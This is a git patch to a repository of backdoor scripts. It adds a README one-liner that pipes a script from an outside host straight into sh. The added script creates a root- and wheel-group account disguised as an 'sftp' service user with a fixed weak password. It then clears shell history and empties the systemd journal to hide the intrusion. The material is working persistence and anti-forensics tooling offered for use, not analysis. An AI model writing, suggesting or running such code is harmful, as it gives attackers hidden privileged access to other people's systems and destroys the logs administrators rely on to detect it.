From 38b0e3e339b188c99b8d08bf09ee8ecd6aec2c45 Mon Sep 17 00:00:00 2001
From: hornet <hornet@lainlounge.xyz>
Date: Thu, 2 Jan 2025 01:56:00 +0500
Subject: [PATCH] first one yay!

---
 README.md       | 10 +++++++++-
 service_user.sh | 12 ++++++++++++
 2 files changed, 21 insertions(+), 1 deletion(-)
 create mode 100755 service_user.sh

diff --git a/README.md b/README.md
index 4dc30f7..f0c569e 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,11 @@
 # backdoors
 
-a collection of backdoor scripts i found/wrote myself
\ No newline at end of file
+a collection of backdoor scripts i found/wrote myself
+more sophisticated stuff coming in future, for now it's just a skiddie's trash bin
+
+## one-liners
+
+### service user backdoor:
+```
+curl -fsSL https://git.lainlounge.xyz/hornet/backdoors/service_user.sh | sh
+``` 
\ No newline at end of file
diff --git a/service_user.sh b/service_user.sh
new file mode 100755
index 0000000..7fe3519
--- /dev/null
+++ b/service_user.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+#extremely simple backdoor, expected to work on systemd/redhat-distros, can be found with a simple look into /etc/passwd file
+#change these to anything you want, to be "disguised" as a service user
+USER="sftp" 
+GROUP="sftp"
+PASSWORD="1337"
+useradd -g $GROUP -G wheel,root $USER
+echo $PASSWORD | passwd --stdin $USER
+echo "done!"
+history -c
+journalctl --rotate
+journalctl --vacuum-size=1B
\ No newline at end of file